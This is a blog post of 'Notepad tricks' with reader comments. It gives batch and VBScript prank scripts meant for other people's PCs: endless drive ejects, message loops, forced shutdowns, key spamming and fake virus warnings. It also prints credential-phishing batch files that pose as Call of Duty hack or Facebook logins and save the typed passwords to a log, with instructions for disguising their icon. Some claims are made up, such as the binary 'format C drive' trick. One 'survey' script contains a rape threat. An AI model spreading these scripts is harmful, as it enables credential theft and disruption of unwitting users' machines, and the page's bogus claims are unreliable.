Search In Site

12 June, 2013

All Notepad Tricks

Notepad Notepad is a simple text editor for Microsoft Windows. It has been included in all versions of Microsoft Windows since Windows 1.0 in 1985.

Features : Notepad is a common text-only (plain text) editor. The resulting files—typically saved with the .txt extension—have no format tags or styles, making the program suitable for editing system files that are to be used in a DOS environment and occasionally, source code for later compilation or execution, usually through a command prompt.

Notepad supports both left-to-right and right-to-left based languages, and one can alternate between these viewing formats by using the right or left Ctrl+⇧ Shift keys to go to right-to-left format or left-to-right format, respectively.
Unlike WordPad, Notepad does not treat newlines in Unix- or Mac-style text files correctly.
Notepad offers only the most basic text manipulation functions, such as finding text. Only newer versions of Windows include an updated version of Notepad with a search and replace function. However it is still poor in comparison to full-scale editors.
Notepad makes use of a built-in window class named "EDIT". In older versions such as those included with Windows 95, Windows 98, Windows Me and Windows 3.1, there is a 64k limit on the size of the file being edited, an operating system limit of the EDIT class.
Up to Windows 95, Fixedsys was the only available display font for Notepad. Windows NT 4.0 and 98 introduced the ability to change this font. As of Windows 2000, the default font was changed to Lucida Console. The font setting, however, only affects how the text is shown to the user and how it is printed, not how the file is saved to disk. The default font was changed to Consolas on Windows 8.
Up to Windows Me, there were almost no keyboard shortcuts and no line-counting feature. Starting with Windows 2000, shortcuts for common tasks like new, open and save were added, as well as a status-bar with a line counter (available only when word-wrap is disabled).
In the Windows NT-based versions of Windows, Notepad can edit traditional 8-bit text files as well as Unicode text files (both UTF-8 and UTF-16, and in case of UTF-16, both little-endian and big-endian).
Notepad also has a simple built-in logging function. Each time a file that starts with .LOG is opened, the program inserts a text timestamp on the last line of the file.[1][2]
Notepad accepts text from the Windows clipboard. When clipboard data with multiple formats is pasted into Notepad, the program will only accept text in the CF_TEXT format.[3] This is useful for stripping embedded font type and style codes from formatted text, such as when copying text from a web page and pasting into an email message or other WYSIWYG text editor. The formatted text is temporarily pasted into Notepad, and then immediately copied again in stripped format to be pasted into the other program.
Files can be printed, but they will not print correctly if "Word Wrap" is turned on. Headers, footers, and margins can be set and adjusted when preparing to print a file under "Page Setup". The date, file name, and other information can be placed in the headers and footers with various codes consisting of an ampersand ('&') followed by a letter.

Here Is A List Of Some Selected Notepad Tricks To Annoy Your Friends By Using These In Their Computer

Test Your Anti-Virus
You can also test your anti virus program for its effectiveness using a simple notepad trick. Follow the steps below to know more:
Open Notepad.
Copy the code give below in the notepad file:
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Save it with an .exe extension like testvirus.exe
As soon as you save this file, your anti virus program will detect the file (virus) immediately and will attempt to delete it. If this happens then your Antivirus is working properly. If not, then its time to look for some other reliable program


Continually pop the CD Drive
Open Notepad.
Copy the code given below onto the notepad file:
Set oWMP = CreateObject(“WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as “Anything.VBS”.

Matrix Effect

follow the steps and see the amazing matrix effect happen in your DOS window:
Open Notepad.
Copy the below mentioned text in your notepad file:
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
Save the file with .bat extension like Matrix.bat


Change The Header/Footer Of Your Notepad File
More often than not whenever you get a printout of your notepad file, it starts with “Untitled” or the filename at top, and “Page ” on bottom. Now if you want to get rid of it or want to change it, just follow the simple steps given below.
Open Notepad.
Click on File -> Page Setup.
Replace the text written in the “Header” and “Footer” box (as shown above) by any of the following codes:
&l Left-align the characters that follow
&c Center the characters that follow
&r Right-align the characters that follow
&d Print the current date
&t Print the current time
&f Print the name of the document
&p Print the page number


Constantly Repeat Messages
Using this notepad trick you can annoy anyone and can actually force them to log off or leave the computer (LOL….). This notepad trick will create an infinite cycle of a message in the computer. Follow the steps to know more:
Open Notepad.
Paste the following code in the notepad file:
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
Save the file with any file name but with .bat as extension and close it. For eg. Freakymessage.bat
After saving the file just open it (by double clicking) and see what happens.
Pssstttt……. You can piss of your friends by sending it as an email attachment asking them to try it out !


Shut-down The Computer After Conveying A Message.
This one is kind of an annoying trick and if used unknowingly can certainly cause problems (am serious). What this trick does is, after conveying a (any) message it shuts down the computer without any confirmation. In order to create the Shutdown file, follow the below mentioned steps:
Open Notepad.
Paste the following code in it:
@echo off
msg * Its time to get some rest.
shutdown -c “Error! You have to take rest! Byeeeeee” -s
Save the file with any name but with .bat extension and close it. For eg. TakeRest.bat


Toggle Keyboard Button Simultaneously
Using Notepad (and VB) you can set different keys on your keyboard to toggle continuously. Following are the 3 tricks using which different keys can be set to toggle simultaneously. Follow the steps given under each head to try out the tricks.
1. Caps Lock Key
Open Notepad.
Paste the following code in the notepad file:
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Save the file with anyname and .vbs extension. and close it.
Now open the newly created file and see how the caps lock key behaves on your keyboard!
2. Hit Enter Key Continuously
Open Notepad.
Paste the following code in the notepad file:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
Save the file with any name and .vbs extension and close it.
Now open the newly created file and see how the enter key behaves!
3. Hit Backspace Key Continuously
Open Notepad.
Paste the following code in the notepad file:
MsgBox “Lets Rumble”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Save the file with any name and with .vbs extension and close it.
Now open the newly created file and see how the key behaves!
In order to end the vbs script (stop continuous key presses), open task manager and end the wscript.exe process as shown in image below.


Type “You are a fool” Continuously
Not much to explain, the title says it all! Follow the steps to make this trick work:
Open Notepad.
Paste the following code in the notepad file:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop
Save the file with any name but with .vbs extension and close it.
Ope the file and see how it makes you type!


Pick Your Option 
When used this creates a file which asks you to choose a number between 1-5 and then does a certain action (as shown below – Action accompanied by number):
1 – Shut’s down the computer
2 – Restart’s the computer
3 – Wipes out the hard drive
4 – Net send
5 – Shows a message & then shut’s down the computer
Before you try out this trick, keep in mind that this can cause loss of important data on your (or any one else’s on which you are running this file) computer system. So BEWARE! In order to create the file, follow the steps given below:
Open Notepad.
Paste the following code in the notepad file:
@echo off
title Get A Life
cd C:
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not cry if you loose your data or anything.
pause
echo Pick your option:
echo 1. Die Slowly
echo 2. Instant Death
echo 3. Stay Away From This One
echo 4. Die this way (For Wimps!)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
Save the file with any name and with a .bat extension and close the file.


Text Into Audio Using Notepad
Open Notepad file on your Windows PC.
Copy and paste the below mentioned code :
Dim message, sapi message=InputBox("Enter your text for conversion–www.hoverpchacks.com","Hover pc Hacks Text-To-Audio Converter") Set sapi=CreateObject("sapi.spvoice") sapi.Speak message
Save this file with any name with .vbs as extension. For eg. Text-To-Audio.vbs
Your Text to Audio converter is ready to be used. Now open the saved file and key in the text you want to convert and click OK. If you find any difficulties in using this code, let me know via comments section.


Format Hard Disk Using Notepad !!
Ever wondered of a way to format your hard disk using just notepad ?
I bet you haven’t even thought about it or if you have had then you would still have preferred using reliable software’s available to do the job. 
In this post i am going to share a simple way to format your C drive (Yep, only C drive) using just notepad. This is just a nice little nifty trick, which i am sharing with you. Make sure you don’t actually use it on your business computer. Try to make this trick work in a VMWare Machine in your free time.
Moving on, in order to completely format your C: Drive (Primary disk) follow the steps given below :-
Open notepad.
Type the following the code in it (Or just copy paste it).
01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000
Save it as an .exe file giving any name you desire.
Thats It ! Now just double click on the file (to open it) and your C: drive will be formatted ! 
This is just a little binary fun. Be Careful while using it.


keylogger/shutdown computer code
@echo off
color c
start Iexplore
Title WARNING
echo WARNING VIRUS HAS ENTERED THROUGH THE DATA FRAME
echo Email Microsoft immediately
cd "C:\CMDREMARKS"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >CMDREMARKS.txt
shutdown -s -t 30 -c "Request Denied"

fake virus that makes user think alll files are being deleted

@echo off
echo WARNING CPU HAS DETECTED A THREAT TO THE SYSTEM
pause
echo ATTEMPTING TO RESTORE BY DELETEING
pause
echo DELETEING ALL FILES!!
pause
shutdown -s -t 30 -c "deleting"
:hack
echo file:2323#@$
echo file:32433$$%%
echo file:#$@#$!53
echo file:#$35323
echo file:24@#$%2
goto hack

key logger that makes users think they are getting 10th prestige in code

@echo off
color a
title Login
cls
echo Please Enter Email Adress And Password.
echo Hacks will be available the next time you log in.
echo Email CodHacks@yahoo.com for support
echo.
echo.
cd "C:\Logs"
set /p user=Username:
set /p pass=Password:
echo prestige (1/2/3/4/5/6/7/8/9/10/11/12/13/14/15)
pause
echo Username="%user%" Password="%pass%" >Log.txt
start >>Program Here<<
exit
NOTE: here are the instructions for the keylogger codes:
Drag And Drop The Folder "Logs" (make one) (also make a txt document named logs inside the folder) To The C:\ Drive
Edit Logger Code.txt To Your Desirations Click File> Save As> and Save it To Your >Desktop< As Logger.bat
make Sure You Save It As Logger.bat or it wont work.
now drag and drop Logger.bat into C:\ Drive
now Create A Shortcut On your Desktop With The Name Of The program that you want to immitate as the title
now change the icon and you are done

keylogger for a facebook

@echo off
color 9
title Login
cls
echo Please Enter Email Adress And Password.
echo Contact FacebookStaff@yahoo.com
echo.
cd "C:\Logs"
set /p user=Username:
set /p pass=Password:
echo Website Blocks Prevented Operation
pause >n
echo Username="%user%" Password="%pass%" >Log.txt
start >>Program Here<<
exit

funny survey you can attach to a file

@echo off
echo Are you a Boy or Girl? (B/G)
pause
echo Are your eyes BLue or brown? (BR/BL)
pause
echo are you gay,straight, or bisexual?(G/S/B)
pause
echo Thanks for describing yourself to me. I will rape you later
pause

simple fake shutdown virus

shutdown -s -t 30 -c "WARNING TROJAN DETECTED"

Unblock CMD

@echo off
command
@echo on

Web Unblocker

@echo off
title web unblocker
nslookup


Open Any program continuously using Notepad
Example : Open Notepad.
Paste the following code in your notepad file:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save the file with any name nut with .bat extension and close it.

4 comments:

  1. some of them dont even work
    wtf

    ReplyDelete
  2. Do
    msg=inputbox("WHICH COUNTRY DO YOU LIVE IN? (1) USA (2) INDIA (3) AFRICA ")
    loop until msg = 3

    Do
    msg=inputbox("WHAT DO YOU EAT? (1) PIZZA (2) BURGER (3) GRASS ")
    loop until msg = 3

    Do
    msg=inputbox("HOW MANY LEGS WITH ,CAN YOU WALK? (1) 4 LEGS (2) 1 LEG (3) 2 LEGS ")
    loop until msg = 1
    Do
    msg=inputbox("WHERE YOU TAKE SHELTER? (1) FLAT (2) BELOW ANY TREE (3) BUNGALOW ")
    loop until msg = 2

    Do
    msg=inputbox("WHAT CAN YOU SAY? (1) HELLO (2) MOOOOO! (3) GOOD MORNING! DUDE ")
    loop until msg = 2

    Do
    msg=inputbox("HOW MANY HORNS DO YOU HAVE? (1) NO WAY! (2) WAIT I AM GOING TO MIRROR (3) 0 ")
    loop until msg = 2

    Do
    msg=inputbox("WHO IS YOUR KEEPER? (1) GOD (2) MYSELF (3) OFCOURSE PARENTS ")
    loop until msg = 1


    Do
    msg=inputbox("WHAT WILL YOU BECOME? (1) ENGINEER (2) PRESIDENT (3) MOOO! ")
    loop until msg = 3

    msgbox("PLEASE WAIT! WE ARE ANALYSING YOUR ANSWERS")
    msgbox("PLZ WAIT 10 SECS.!")

    For i = 1 to 15
    wscript.echo i
    Next
    MSGBOX("HEY 15 SECS ARE NOT OUR FAULT YOUR PC IS SLOW")
    MSGBOX("BY THE WAY")
    msgbox("AHAA! WE FOUND IT")
    msgbox(" YOU ARE A")
    msgbox("GAZELLE")
    msgbox("SONGS FOR GAZELLE MOOOOO MMOOOOOO")
    MSGBOX ("LOL")

    Do
    msg=inputbox("CREATED BY? (1) HATIM (2) PRESIDENT (3) MOOO! ")
    loop until msg = 1


    ReplyDelete
  3. The cmd unblock does not work!!! @##%@&$@&#&@$@#@%&#&#$##%#%@!!!!

    ReplyDelete

Dear Visitors All The Tricks And Hacks Posted Here Are Only For Knowledge Purpose.Don't Use These for Illegal Operations.

 
Twitter Bird Gadget